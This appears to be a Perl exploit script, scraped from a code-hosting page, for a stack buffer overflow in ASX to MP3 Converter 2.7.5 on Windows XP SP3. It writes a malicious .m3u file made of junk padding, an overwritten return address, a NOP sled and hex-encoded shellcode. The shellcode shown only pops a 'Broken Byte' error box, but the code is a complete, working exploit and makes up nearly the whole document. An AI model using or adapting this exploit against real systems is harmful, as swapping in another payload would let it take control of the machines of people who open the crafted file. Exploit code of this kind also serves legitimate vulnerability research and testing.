50 lines
No EOL
1.5 KiB
Perl
Executable file
50 lines
No EOL
1.5 KiB
Perl
Executable file
###########################################################################################
|
|
# Exploit Title: ASX to MP3 Converter 2.7.5 stack buffer overflow
|
|
# Date: 6 Oct 2014
|
|
# Exploit Author: Amir Reza Tavakolian
|
|
# Vendor Homepage: http://binarylife.blog.ir/
|
|
# Software Link: http://download.cnet.com/ASX-to-MP3-Converter/3000-2168_4-10385919.html
|
|
# Version: 2.7.5
|
|
# Tested on: windows xp sp 3
|
|
#
|
|
#
|
|
# Special thanks to Mr Michael Czumak (T_v3rn1x) for his tutorial in securitysift.com.
|
|
# Thanks Mike. :)
|
|
##########################################################################################
|
|
|
|
|
|
|
|
|
|
|
|
#!/usr/bin/perl
|
|
|
|
my $junk = "\x41" x 35056;
|
|
my $eip = pack ('V', 0x73e848a7);
|
|
|
|
|
|
|
|
my $nop = "\x90" x 4;
|
|
|
|
my $shellcode = "\x90" x 25;
|
|
$shellcode = $shellcode . "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" .
|
|
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" .
|
|
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" .
|
|
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" .
|
|
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" .
|
|
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74" .
|
|
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe" .
|
|
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
|
|
|
|
my $junk1 = "c" x 24806;
|
|
|
|
|
|
|
|
|
|
my $total = $junk.$eip.$nop.$shellcode.$junk1;
|
|
my $file = "poc1.m3u";
|
|
|
|
|
|
open (FILE, ">$file");
|
|
print FILE $total;
|
|
close (FILE);
|
|
print "Done.../"; |